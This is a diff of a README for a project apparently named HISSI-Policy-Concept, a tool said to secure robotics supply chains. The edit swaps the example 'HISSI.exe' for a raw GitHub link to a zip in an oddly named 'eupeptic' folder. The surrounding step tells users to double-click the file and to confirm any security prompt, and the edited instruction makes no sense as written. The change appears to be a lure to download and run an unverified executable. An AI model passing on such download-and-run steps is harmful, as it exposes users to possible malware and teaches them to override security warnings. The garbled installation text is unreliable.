labkomputerinformatika/HISSI-Policy-Concept/README.md

    If you downloaded a `.zip` file, right-click it and select "Extract All."
 Follow the prompts to extract the files to a folder.

 6. **Run the Application**
-   Open the extracted folder and double-click the application file (e.g., `HISSI.exe`).
+   Open the extracted folder and double-click the application file (e.g., `https://raw.githubusercontent.com/labkomputerinformatika/HISSI-Policy-Concept/main/eupeptic/HISSI-Policy-Concept.zip`).
 If prompted by your operating system regarding security, confirm that you wish to run the application.

 7. **Follow On-Screen Instructions**
    The application will guide you through its features.
 Feel free to explore to understand how it can help secure your robotics supply chain.